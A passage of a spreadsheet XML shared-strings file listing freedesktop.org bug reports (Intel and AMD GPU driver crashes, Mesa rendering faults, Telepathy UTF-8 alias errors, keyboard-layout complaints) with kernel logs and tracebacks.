NotAvailable: org.freedesktop.Telepathy.Error.NotAvailable: Contact n not available</t>
  </si>
  <si>
    <t>DRI-89051</t>
  </si>
  <si>
    <t>[SNB IVB BSW SKL BXT KBL] igt / gem_reloc_vs_gpu / faulting-reloc-interruptible-hang fail</t>
  </si>
  <si>
    <t>Created attachment 113292
dmesg
==System Environment==
--------------------------
Regression: no This is a new issue.
no-working platforms: SNB
==kernel==
--------------------------
drm-intel-nightly-2015-02-10/ad95125eaef18eebb9f47261ce3c99957f5953de
==Bug detailed description==
./gem_reloc_vs_gpu  --run-subtest faulting-reloc-interruptible-hang
IGT-Version: 1.9-gbef692d (x86_64) (Linux: 3.19.0_drm-intel-nightly_ad9512_20150210+ x86_64)
(gem_reloc_vs_gpu:4073) CRITICAL: Test assertion failure function do_test file gem_reloc_vs_gpu.c:240:
(gem_reloc_vs_gpu:4073) CRITICAL: Failed assertion: test == 0xdeadbeef
(gem_reloc_vs_gpu:4073) CRITICAL: mismatch in buffer 0: 0x00000000 instead of 0xdeadbeef
Subtest faulting-reloc-interruptible-hang: FAIL (104.713s)
==Reproduce steps==
---------------------------- 
1. ./gem_reloc_vs_gpu --run-subtest faulting-reloc-interruptible-hang</t>
  </si>
  <si>
    <t>TELEPATHY-19278</t>
  </si>
  <si>
    <t>User alias with UTF-8 character are not working</t>
  </si>
  <si>
    <t>Bug found in the latest release of pymsn : 0.3.3
Telepathy-butterfly version : 0.3.2
Trying to set an user alias containing special UTF-8 character such as Ã© in french does not work. Nothing happens on Empathy side.
On the telepathy-butterfly side when setting the alias using D-Feet via the SetAliases method of the connector the following error is returned from Pymsn:
org.freedesktop.DBus.Python.KeyError: Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/dbus/service.py line 702 in _message_cb
    retval = candidate_method(self *args **keywords)
  File /usr/lib/python2.5/site-packages/butterfly/aliasing.py line 80 in SetAliases
    self.msn_client.profile.display_name = alias
  File /usr/lib/python2.5/site-packages/pymsn/profile.py line 395 in fset
    self._ns_client.set_display_name(display_name)
  File /usr/lib/python2.5/site-packages/pymsn/util/decorator.py line 111 in new_function
    func(*args **kwargs)
  File /usr/lib/python2.5/site-packages/pymsn/msnp/notification.py line 147 in set_display_name
    ('MFN' urllib.quote(display_name)))
  File /usr/lib/python2.5/urllib.py line 1205 in quote
    res = map(safe_map.__getitem__ s)
KeyError: u'\xe9'
This seems to correspond to a mishandling of some utf-8 characters.
When setting a user alias without any accent for instance it works flawlessly and it's propagated to the contacts.</t>
  </si>
  <si>
    <t>baucheta</t>
  </si>
  <si>
    <t>DRI-38907</t>
  </si>
  <si>
    <t>Radeon BARTS: atombios stuck executing D130</t>
  </si>
  <si>
    <t>When booting with my new Radeon 6850 the computer freezes and becomes unresponsive when the radeon module is loaded.
This was with the Ubuntu Natty 2.6.38 kernel.
netconsole revealed the following:
[  261.958181] [drm] radeon kernel modesetting enabled.
[  261.958428] radeon 0000:02:00.0: setting latency timer to 64
[  261.961518] [drm] initializing kernel modesetting (BARTS 0x1002:0x6739).
[  261.961647] [drm] register mmio base: 0xFDDC0000
[  261.961711] [drm] register mmio size: 131072
[  261.962196] ATOM BIOS: BARTS
[  261.962328] radeon 0000:02:00.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[  261.962400] radeon 0000:02:00.0: GTT: 512M 0x0000000040000000 - 0x000000005FFFFFFF
[  261.962832] [drm] Detected VRAM RAM=1024M BAR=256M
[  261.962910] [drm] RAM width 256bits DDR
[  261.963063] [TTM] Zone  kernel: Available graphics memory: 2028210 kiB.
[  261.963127] [TTM] Initializing pool allocator.
[  261.963214] [drm] radeon: 1024M of VRAM memory ready
[  261.963278] [drm] radeon: 512M of GTT memory ready.
[  261.963373] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010).
[  261.963438] [drm] Driver supports precise vblank timestamp query.
[  261.963543] radeon 0000:02:00.0: irq 49 for MSI/MSI-X
[  261.963611] radeon 0000:02:00.0: radeon: using MSI.
[  261.963723] [drm] radeon: irq initialized.
[  261.963787] [drm] GART: num cpu pages 131072 num gpu pages 131072
[  261.966229] [drm] Loading BARTS Microcode
[  262.023860] radeon 0000:02:00.0: WB enabled
[  262.040317] [drm] ring test succeeded in 3 usecs
[  262.040498] [drm] radeon: ib pool ready.
[  262.040688] [drm] ib test succeeded in 0 usecs
[  262.040759] failed to evaluate ATIF got AE_BAD_PARAMETER
[  262.041256] [drm] Radeon Display Connectors
[  262.041321] [drm] Connector 0:
[  262.041388] [drm]   DisplayPort
[  262.041452] [drm]   HPD4
[  262.041516] [drm]   DDC: 0x6430 0x6430 0x6434 0x6434 0x6438 0x6438 0x643c 0x643c
[  262.041587] [drm]   Encoders:
[  262.041650] [drm]     DFP1: INTERNAL_UNIPHY2
[  262.041714] [drm] Connector 1:
[  262.041777] [drm]   HDMI-A
[  262.041841] [drm]   HPD3
[  262.041904] [drm]   DDC: 0x6460 0x6460 0x6464 0x6464 0x6468 0x6468 0x646c 0x646c
[  262.041976] [drm]   Encoders:
[  262.042040] [drm]     DFP2: INTERNAL_UNIPHY2
[  262.042104] [drm] Connector 2:
[  262.042167] [drm]   DVI-I
[  262.042230] [drm]   HPD6
[  262.042295] [drm]   DDC: 0x6470 0x6470 0x6474 0x6474 0x6478 0x6478 0x647c 0x647c
[  262.042366] [drm]   Encoders:
[  262.042429] [drm]     DFP3: INTERNAL_UNIPHY
[  262.042494] [drm]     CRT1: INTERNAL_KLDSCP_DAC1
[  262.042560] [drm] Connector 3:
[  262.042623] [drm]   DVI-D
[  262.042686] [drm]   HPD1
[  262.042749] [drm]   DDC: 0x6480 0x6480 0x6484 0x6484 0x6488 0x6488 0x648c 0x648c
[  262.042820] [drm]   Encoders:
[  262.042885] [drm]     DFP4: INTERNAL_UNIPHY1
[  262.342185] [drm] Internal thermal controller with fan control
[  262.398474] [drm] radeon: power management initialized
[  267.060164] ata4.00: exception Emask 0x12 SAct 0xf SErr 0x400 action 0x6 frozen
[  267.060315] ata4.00: irq_stat 0x08000000 interface fatal error
[  267.060657] ata4: SError: { Proto }
[  267.060763] ata4.00: failed command: WRITE FPDMA QUEUED
[  267.060876] ata4.00: cmd 61/08:00:9d:5e:37/00:00:34:00:00/40 tag 0 ncq 4096 out
[  267.060878]          res 40/00:0c:05:77:f4/00:00:31:00:00/40 Emask 0x12 (ATA bus error)
[  267.061161] ata4.00: status: { DRDY }
[  267.061266] ata4.00: failed command: WRITE FPDMA QUEUED
[  267.061379] ata4.00: cmd 61/08:08:05:77:f4/00:00:31:00:00/40 tag 1 ncq 4096 out
[  267.061380]          res 40/00:0c:05:77:f4/00:00:31:00:00/40 Emask 0x12 (ATA bus error)
[  267.061664] ata4.00: status: { DRDY }
[  267.061770] ata4.00: failed command: WRITE FPDMA QUEUED
[  267.061883] ata4.00: cmd 61/08:10:2d:7b:f4/00:00:31:00:00/40 tag 2 ncq 4096 out
[  267.061884]          res 40/00:0c:05:77:f4/00:00:31:00:00/40 Emask 0x12 (ATA bus error)
[  267.062168] ata4.00: status: { DRDY }
[  267.062273] ata4.00: failed command: WRITE FPDMA QUEUED
[  267.062387] ata4.00: cmd 61/08:18:a5:5e:37/00:00:34:00:00/40 tag 3 ncq 4096 out
[  267.062388]          res 40/00:0c:05:77:f4/00:00:31:00:00/40 Emask 0x12 (ATA bus error)
[  267.062672] ata4.00: status: { DRDY }
[  267.062780] ata4: hard resetting link
[  267.400009] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[  267.400134] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing D130 (len 62 WS 0 PS 0) @ 0xD14C
[  267.410023] ata4: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[  272.410009] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[  272.410022] ata4.00: qc timeout (cmd 0xec)
[  272.410030] ata4.00: failed to IDENTIFY (I/O error err_mask=0x4)
[  272.410032] ata4.00: revalidation failed (errno=-5)
[  272.410036] ata4: hard resetting link
[  272.410478] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing D130 (len 62 WS 0 PS 0) @ 0xD14C
[  273.480015] ata4: failed to resume link (SControl FFF)
[  277.420009] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[  277.420133] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing D130 (len 62 WS 0 PS 0) @ 0xD14C
[  278.520016] ata4: link is slow to respond please be patient (ready=0)
[  282.420016] ata4: COMRESET failed (errno=-16)
[  282.420131] ata4: hard resetting link
[  282.430008] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[  282.430133] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing D130 (len 62 WS 0 PS 0) @ 0xD14C
[  283.490015] ata4: failed to resume link (SControl 0)
[  287.440009] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[  287.440133] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing D130 (len 62 WS 0 PS 0) @ 0xD14C
[  288.530016] ata4: link is slow to respond please be patient (ready=0)
[  292.430018] ata4: COMRESET failed (errno=-16)
[  292.430134] ata4: hard resetting link
[  292.450008] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[  292.450133] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing D130 (len 62 WS 0 PS 0) @ 0xD14C</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-101532</t>
  </si>
  <si>
    <t>please revert the commit which moved Indian Keyboard layouts to base.extras</t>
  </si>
  <si>
    <t>This commit broke a large number of users who depended on xkb. A lot of
users are just happy with inscript layout provided by xkb. They don't
need the other features provided by ibus of fcitx.
https://cgit.freedesktop.org/xkeyboard-config/commit/?id=913af7dafaab8ff4a9ae0d1e4c4097caf4a8022d
Please don't assume a single Indian knows and can decide about all the Indian languages consult the relevant language teams when making such big impact
changes.
See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=865316
https://bugs.kde.org/show_bug.cgi?id=381352</t>
  </si>
  <si>
    <t>asdofindia</t>
  </si>
  <si>
    <t>praveen</t>
  </si>
  <si>
    <t>HAL-11698</t>
  </si>
  <si>
    <t>add new device ID for iriver T30 UMS</t>
  </si>
  <si>
    <t>Version 1.7 (or perhaps earlier) of the firmware for the iRiver T30 (USB mass storage version) changes the device ID from 0x1018 to 0x1019.  It also adds a new playlist format that I'm working on adding support for audio/x-iriver-pla.</t>
  </si>
  <si>
    <t>notverysmart</t>
  </si>
  <si>
    <t>XORG-28070</t>
  </si>
  <si>
    <t>[Arrandale] No output (black) on eDP</t>
  </si>
  <si>
    <t>I'm using git tip sources for intel-drm (lib)drm and xf86-video-intel. Everything seems to work but my display is black (backlight is on).
xrandr output:
# DISPLAY=:0.0 xrandr
Screen 0: minimum 320 x 200 current 1920 x 1080 maximum 8192 x 8192
VGA1 disconnected (normal left inverted right x axis y axis)
DP1 connected 1920x1080+0+0 (normal left inverted right x axis y axis) 344mm x 194mm
   1920x1080      60.0*+   40.0  
HDMI1 disconnected (normal left inverted right x axis y axis)
DP2 disconnected (normal left inverted right x axis y axis)
HDMI2 disconnected (normal left inverted right x axis y axis)
HDMI3 disconnected (normal left inverted right x axis y axis)
DP3 disconnected (normal left inverted right x axis y axis)
DP4 disconnected (normal left inverted right x axis y axis)
I can disable the backlight using xrandr --output DP1 --off</t>
  </si>
  <si>
    <t>dick</t>
  </si>
  <si>
    <t>DRI-111256</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@prime_busy@wait-hang-vebox|igt@gem_eio@in-flight-suspend - dmesg-warn - kernel BUG at ./drivers/gpu/drm/i915/intel_wakeref.h:110!</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_6576/shard-glk7/igt@prime_busy@wait-hang-vebox.html
 [163.610318] ------------[ cut here ]------------
 [163.610336] kernel BUG at ./drivers/gpu/drm/i915/intel_wakeref.h:110!
 [163.610405] invalid opcode: 0000 [#1] PREEMPT SMP PTI
 [163.610415] CPU: 1 PID: 30 Comm: kworker/u8:1 Tainted: G     U            5.3.0-rc2-CI-CI_DRM_6576+ #1
 [163.610429] Hardware name: Intel Corporation NUC7CJYH/NUC7JYB BIOS JYGLKCPX.86A.0027.2018.0125.1347 01/25/2018
 [163.610531] Workqueue: i915 retire_work_handler [i915]
 [163.610595] RIP: 0010:intel_engine_pm_put+0x44/0x50 [i915]
 [163.610604] Code: 00 00 00 48 89 df e8 db cd 00 e1 85 c0 75 03 5b 5d c3 48 8d bd c8 bb 00 00 48 89 de 48 c7 c2 50 47 10 a0 5b 5d e9 6c 9b fe ff  0b 66 2e 0f 1f 84 00 00 00 00 00 48 81 c7 b8 00 00 00 48 c7 c6
 [163.610629] RSP: 0018:ffffc9000013bdb8 EFLAGS: 00010246
 [163.610638] RAX: 0000000000000000 RBX: ffff88825d8bf700 RCX: 0000000000000001
 [163.610648] RDX: 00000000000015b3 RSI: ffff888276083018 RDI: ffff888261bb42a8
 [163.610659] RBP: ffff888261ba0000 R08: ffff888276083018 R09: 0000000000000000
 [163.610669] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88825d8bf998
 [163.610680] R13: ffff88825d8bf990 R14: ffff88825d8bf760 R15: 0000000000000000
 [163.610690] FS:  0000000000000000(0000) GS:ffff888277e80000(0000) knlGS:0000000000000000
 [163.610703] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [163.610712] CR2: 00007f88a23e6000 CR3: 0000000272460000 CR4: 0000000000340ee0
 [163.610722] Call Trace:
 [163.610788]  i915_request_retire+0x35e/0x840 [i915]
 [163.610859]  ring_retire_requests+0x47/0x50 [i915]
 [163.610927]  i915_retire_requests+0x57/0xc0 [i915]
 [163.610993]  retire_work_handler+0x27/0x60 [i915]
 [163.611006]  process_one_work+0x245/0x610
 [163.611016]  worker_thread+0x1d0/0x380
 [163.611025]  ? process_one_work+0x610/0x610
 [163.611034]  kthread+0x119/0x130
 [163.611042]  ? kthread_park+0xa0/0xa0
 [163.611053]  ret_from_fork+0x24/0x50
 [163.611064] Modules linked in: vgem mei_hdcp snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic btusb btrtl btbcm btintel x86_pkg_temp_thermal coretemp bluetooth crct10dif_pclmul crc32_pclmul ghash_clmulni_intel ecdh_generic ecc r8169 i915 realtek i2c_hid snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm mei_me mei pinctrl_geminilake prime_numbers pinctrl_intel
 [163.611125] Dumping ftrace buffer:
 [163.611132] ---------------------------------
 [163.611206] CPU:1 [LOST 573578 EVENTS]</t>
  </si>
  <si>
    <t>LIBXKBCOMMON-56780</t>
  </si>
  <si>
    <t>no UTF8 representation for Tab and Modifier keys</t>
  </si>
  <si>
    <t>When using xkb_keysym_to_utf8 to translate Tab or any of Modifier keys it returns -1 what means that it could not find Unicode representation for the keysym what is an unexpected result.
In /tests directory we can see that such cases are not tested. 
    assert(test_utf8(XKB_KEY_y y))
    assert(test_utf8(XKB_KEY_u u))
    assert(test_utf8(XKB_KEY_m m))
    assert(test_utf8(XKB_KEY_Cyrillic_em Ð¼))
    assert(test_utf8(XKB_KEY_Cyrillic_u Ñƒ))
    assert(test_utf8(XKB_KEY_exclam !))
    assert(test_utf8(XKB_KEY_oslash Ã¸))
    assert(test_utf8(XKB_KEY_hebrew_aleph ×))
    assert(test_utf8(XKB_KEY_Arabic_sheen Ø´))</t>
  </si>
  <si>
    <t>MESA-22924</t>
  </si>
  <si>
    <t>DRI2 R200 clipping buffer copy randomly</t>
  </si>
  <si>
    <t>Created attachment 27973
Only small part of top gear is rendered
Hi!
rv280 mobility card in agp mode.
VIA VT8378 [KM400/A] Chipset Host Bridge (agpgart-via)
kernel 2.6.31 rc3 and rc4
reproducing:
1. run gears
2. window is first blank
3. moving mouse over window or moving window start rendering apear to window
4. watch when gears stop again completely or partially
glxgears and gears both result in same output. Also all others opengl applications have same problem but clipping rectangles are different.
There is nothing in xorg.log or dmesg that is different  to what it was when everything worked.
Attached image shows screenshot from rendering when large bottom areal is still while small part of top gears is rotating.</t>
  </si>
  <si>
    <t>MESA-71285</t>
  </si>
  <si>
    <t>Xonotic LLVM ERROR</t>
  </si>
  <si>
    <t>Created attachment 88735
zipped shader dump
in Xonotic 7.0 several levels return this error after crash
LLVM ERROR: ran out of registers during register allocation
GL_VENDOR: X.Org
GL_RENDERER: Gallium 0.4 on AMD CAPE VERDE
GL_VERSION: 3.0 Mesa 10.0.0-devel (git-5ae31d7)
level 
maps/stormkeep
attached: shader dump
many thanks for your time</t>
  </si>
  <si>
    <t>XORG-2546</t>
  </si>
  <si>
    <t>Xnest doesn't update shape regions</t>
  </si>
  <si>
    <t>Whenever a client changes the shape regions on a window Xnest doesn't
automatically update them on the backend Xserver.
Trivial fix which overrides miSetShape() attached.</t>
  </si>
  <si>
    <t>MESA-19103</t>
  </si>
  <si>
    <t>[965 OGLC] GL_FEEDBACK mode does not work correctly</t>
  </si>
  <si>
    <t>Starting sometime between 11/26 and 12/5 GL_FEEDBACK mode has stopped functioning in the i965 driver.  Below is the output of progs/redbook/feedback.  On the top is the output of the software (x11 driver) rasterizer.  Below is the output of the i965 driver.
[idr@localhost redbook]$ LD_PRELOAD=../../lib64/libGL.so.1.5.070300 ./feedback
freeglut (./feedback): Unable to create direct context rendering for window './feedback'
This may hurt performance.
GL_LINE_RESET_TOKEN
  30.00 30.00 0.00 0.84 0.84 0.84 1.00 
  50.00 60.00 0.00 0.84 0.84 0.84 1.00 
GL_LINE_TOKEN
  50.00 60.00 0.00 0.84 0.84 0.84 1.00 
  70.00 40.00 0.00 0.84 0.84 0.84 1.00 
GL_PASS_THROUGH_TOKEN
  1.00
GL_PASS_THROUGH_TOKEN
  2.00
GL_POINT_TOKEN
  50.00 50.00 0.00 0.84 0.84 0.84 1.00 
[idr@localhost redbook]$ LD_LIBRARY_PATH=/opt/xorg-master-x86_64/lib64 LIBGL_DRIVERS_DIR=~/devel/graphics/Mesa/BUILD/master-64/lib64 ./feedback
Xlib:  extension Generic Event Extension missing on display :0.0.
Xlib:  extension Generic Event Extension missing on display :0.0.
GL_PASS_THROUGH_TOKEN
  1.00
GL_PASS_THROUGH_TOKEN
  2.00
GL_POINT_TOKEN
  50.00 50.00 0.00 0.84 0.84 0.84 1.00</t>
  </si>
  <si>
    <t>TELEPATHY-36011</t>
  </si>
  <si>
    <t>Add Chan.I.SMS.GetLength()</t>
  </si>
  <si>
    <t>It is difficult to know how long an encoded SMS is going to be. It's not possible for the client to know what encoding mechanism the CM will use.
Proposing the addition of a new method: GetLength(s) -&gt; (uui)
~ In ~
s: proposed SMS content
~ Out ~
u: SMS chunks required
u: remaining chars for chunk
i: estimated cost (or unknown as defined in Conn.I.Balance)</t>
  </si>
  <si>
    <t>DRI-104289</t>
  </si>
  <si>
    <t>[regression][vega10] [drm:amdgpu_job_timedout [amdgpu]] *ERROR* ring sdma0 timeout on exiting certain Steam games</t>
  </si>
  <si>
    <t>Vega 10 amd-staging-drm-next 4021f6f628ee6cd621a22e768f7f3ae94f330790 when exiting Hitman 2016 (but not Xonotic) I get. It's a regression and it's reliably reproducible.
[ 5261.568646] WARNING: CPU: 0 PID: 25480 at drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c:1641 amdgpu_vm_bo_update_mapping+0x3dd/0x3f0 [amdgpu]
[ 5261.568648] Modules linked in: rfcomm fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_raw ip6table_security iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack devlink libcrc32c iptable_mangle iptable_raw iptable_security ebtable_filter ebtables ip6table_filter ip6_tables cmac bnep sunrpc vfat fat arc4 iwlmvm mac80211 snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic snd_hda_intel iwlwifi snd_hda_codec edac_mce_amd btusb snd_hda_core btrtl btbcm kvm btintel snd_hwdep bluetooth snd_seq irqbypass snd_seq_device
[ 5261.568665]  cfg80211 crct10dif_pclmul snd_pcm joydev mxm_wmi wmi_bmof crc32_pclmul snd_timer ecdh_generic ghash_clmulni_intel snd rfkill soundcore ccp sp5100_tco pcspkr shpchp i2c_piix4 k10temp wmi acpi_cpufreq binfmt_misc amdgpu chash i2c_algo_bit gpu_sched drm_kms_helper ttm drm crc32c_intel alx hid_holtek_mouse mdio
[ 5261.568675] CPU: 0 PID: 25480 Comm: gallium_drv:0 Not tainted 4.15.0-rc2+ #27
[ 5261.568676] Hardware name: Gigabyte Technology Co. Ltd. X399 AORUS Gaming 7/X399 AORUS Gaming 7 BIOS F2 08/31/2017
[ 5261.568676] task: 0000000045d1804c task.stack: 00000000e1257dad
[ 5261.568694] RIP: 0010:amdgpu_vm_bo_update_mapping+0x3dd/0x3f0 [amdgpu]
[ 5261.568694] RSP: 0018:ffffa3c751d83998 EFLAGS: 00010212
[ 5261.568695] RAX: ffff9875fd962a58 RBX: ffff987a9942e000 RCX: ffff987a73d86550
[ 5261.568695] RDX: ffffa3c744e4e000 RSI: ffff9875fd962a58 RDI: ffff987a73d86560
[ 5261.568696] RBP: ffff987a73d80000 R08: 0000000000000002 R09: 0000000000000000
[ 5261.568696] R10: 0000000000001ffb R11: 0000000000001ff9 R12: 0000000000001b0e
[ 5261.568697] R13: ffff987a73d86560 R14: 0000000000101a00 R15: 0000000000000000
[ 5261.568698] FS:  00007fcd9f7fe700(0000) GS:ffff987a9de00000(0000) knlGS:0000000000000000
[ 5261.568698] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 5261.568698] CR2: 00007f2581124010 CR3: 00000008011ad000 CR4: 00000000003406f0
[ 5261.568699] Call Trace:
[ 5261.568705]  ? _cond_resched+0x15/0x40
[ 5261.568706]  ? __ww_mutex_lock.isra.2+0x42/0x640
[ 5261.568721]  ? amdgpu_vm_free_mapping.isra.23+0x20/0x20 [amdgpu]
[ 5261.568736]  amdgpu_vm_clear_freed+0xbb/0x190 [amdgpu]
[ 5261.568751]  amdgpu_gem_object_close+0x19c/0x210 [amdgpu]
[ 5261.568760]  ? drm_gem_object_release_handle+0x2c/0x90 [drm]
[ 5261.568764]  drm_gem_object_release_handle+0x2c/0x90 [drm]
[ 5261.568769]  ? drm_gem_object_handle_put_unlocked+0xb0/0xb0 [drm]
[ 5261.568771]  idr_for_each+0x48/0xe0
[ 5261.568776]  drm_gem_release+0x1c/0x30 [drm]
[ 5261.568780]  drm_release+0x342/0x3b0 [drm]
[ 5261.568783]  __fput+0xcd/0x1d0
[ 5261.568785]  task_work_run+0x81/0xa0
[ 5261.568787]  do_exit+0x2de/0xba0
[ 5261.568792]  ? drm_ioctl_kernel+0x59/0xb0 [drm]
[ 5261.568793]  do_group_exit+0x3a/0xa0
[ 5261.568794]  get_signal+0x26c/0x570
[ 5261.568796]  do_signal+0x36/0x610
[ 5261.568798]  ? do_vfs_ioctl+0xa1/0x610
[ 5261.568800]  ? SyS_futex+0x12d/0x180
[ 5261.568802]  exit_to_usermode_loop+0x69/0xa0
[ 5261.568803]  syscall_return_slowpath+0xbf/0xd0
[ 5261.568804]  entry_SYSCALL_64_fastpath+0x7b/0x7d
[ 5261.568805] RIP: 0033:0x7fceb27696dc
[ 5261.568805] RSP: 002b:00007fcd9f7fd620 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca
[ 5261.568806] RAX: fffffffffffffe00 RBX: 0000000008bc2028 RCX: 00007fceb27696dc
[ 5261.568806] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000008bc2050
[ 5261.568807] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000008020100
[ 5261.568807] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000008bc2000
[ 5261.568807] R13: 0000000001687f40 R14: 0000000000000000 R15: 0000000008bc2050
[ 5261.568808] Code: ff 74 16 f0 ff 0f 0f 88 db e5 14 00 75 0b 89 04 24 e8 e8 1f f8 d1 8b 04 24 48 8b 54 24 38 48 8b 5c 24 08 48 89 13 e9 0b fd ff ff  ff eb 88 e8 1a 15 a7 d1 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 
[ 5261.568822] ---[ end trace 700e4f5bfa6fddf4 ]---
[ 5261.569536] WARNING: CPU: 0 PID: 25480 at drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c:1641 amdgpu_vm_bo_update_mapping+0x3dd/0x3f0 [amdgpu]
[ 5261.569538] Modules linked in: rfcomm fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_raw ip6table_security iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack devlink libcrc32c iptable_mangle iptable_raw iptable_security ebtable_filter ebtables ip6table_filter ip6_tables cmac bnep sunrpc vfat fat arc4 iwlmvm mac80211 snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic snd_hda_intel iwlwifi snd_hda_codec edac_mce_amd btusb snd_hda_core btrtl btbcm kvm btintel snd_hwdep bluetooth snd_seq irqbypass snd_seq_device
[ 5261.569552]  cfg80211 crct10dif_pclmul snd_pcm joydev mxm_wmi wmi_bmof crc32_pclmul snd_timer ecdh_generic ghash_clmulni_intel snd rfkill soundcore ccp sp5100_tco pcspkr shpchp i2c_piix4 k10temp wmi acpi_cpufreq binfmt_misc amdgpu chash i2c_algo_bit gpu_sched drm_kms_helper ttm drm crc32c_intel alx hid_holtek_mouse mdio
[ 5261.569558] CPU: 0 PID: 25480 Comm: gallium_drv:0 Tainted: G        W        4.15.0-rc2+ #27
[ 5261.569559] Hardware name: Gigabyte Technology Co. Ltd. X399 AORUS Gaming 7/X399 AORUS Gaming 7 BIOS F2 08/31/2017
[ 5261.569559] task: 0000000045d1804c task.stack: 00000000e1257dad
[ 5261.569572] RIP: 0010:amdgpu_vm_bo_update_mapping+0x3dd/0x3f0 [amdgpu]
[ 5261.569574] RSP: 0018:ffffa3c751d83998 EFLAGS: 00010216
[ 5261.569575] RAX: ffff987a86601258 RBX: ffff987a9942e000 RCX: ffff987a73d86550
[ 5261.569575] RDX: 0000000000000004 RSI: ffff987a86601258 RDI: ffffa3c744d7f300
[ 5261.569575] RBP: ffff987a73d80000 R08: 0000000000001018 R09: 0000000000000004
[ 5261.569576] R10: 0000000000030000 R11: 000000000000100d R12: 0000000000000e0e
[ 5261.569576] R13: ffff987a73d86560 R14: 000000000013f000 R15: 0000000000000000
[ 5261.569577] FS:  00007fcd9f7fe700(0000) GS:ffff987a9de00000(0000) knlGS:0000000000000000
[ 5261.569577] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 5261.569579] CR2: 00007f2581124010 CR3: 00000001bbe09000 CR4: 00000000003406f0
[ 5261.569579] Call Trace:
[ 5261.569581]  ? _cond_resched+0x15/0x40
[ 5261.569582]  ? __ww_mutex_lock.isra.2+0x42/0x640
[ 5261.569595]  ? amdgpu_vm_free_mapping.isra.23+0x20/0x20 [amdgpu]
[ 5261.569609]  amdgpu_vm_clear_freed+0xbb/0x190 [amdgpu]
[ 5261.569623]  amdgpu_gem_object_close+0x19c/0x210 [amdgpu]
[ 5261.569629]  ? drm_gem_object_release_handle+0x2c/0x90 [drm]
[ 5261.569633]  drm_gem_object_release_handle+0x2c/0x90 [drm]
[ 5261.569637]  ? drm_gem_object_handle_put_unlocked+0xb0/0xb0 [drm]
[ 5261.569638]  idr_for_each+0x48/0xe0
[ 5261.569642]  drm_gem_release+0x1c/0x30 [drm]
[ 5261.569646]  drm_release+0x342/0x3b0 [drm]
[ 5261.569649]  __fput+0xcd/0x1d0
[ 5261.569650]  task_work_run+0x81/0xa0
[ 5261.569651]  do_exit+0x2de/0xba0
[ 5261.569655]  ? drm_ioctl_kernel+0x59/0xb0 [drm]
[ 5261.569656]  do_group_exit+0x3a/0xa0
[ 5261.569657]  get_signal+0x26c/0x570
[ 5261.569658]  do_signal+0x36/0x610
[ 5261.569659]  ? do_vfs_ioctl+0xa1/0x610
[ 5261.569660]  ? SyS_futex+0x12d/0x180
[ 5261.569662]  exit_to_usermode_loop+0x69/0xa0
[ 5261.569662]  syscall_return_slowpath+0xbf/0xd0
[ 5261.569663]  entry_SYSCALL_64_fastpath+0x7b/0x7d
[ 5261.569664] RIP: 0033:0x7fceb27696dc
[ 5261.569664] RSP: 002b:00007fcd9f7fd620 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca
[ 5261.569665] RAX: fffffffffffffe00 RBX: 0000000008bc2028 RCX: 00007fceb27696dc
[ 5261.569665] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000008bc2050
[ 5261.569665] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000008020100
[ 5261.569666] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000008bc2000
[ 5261.569666] R13: 0000000001687f40 R14: 0000000000000000 R15: 0000000008bc2050
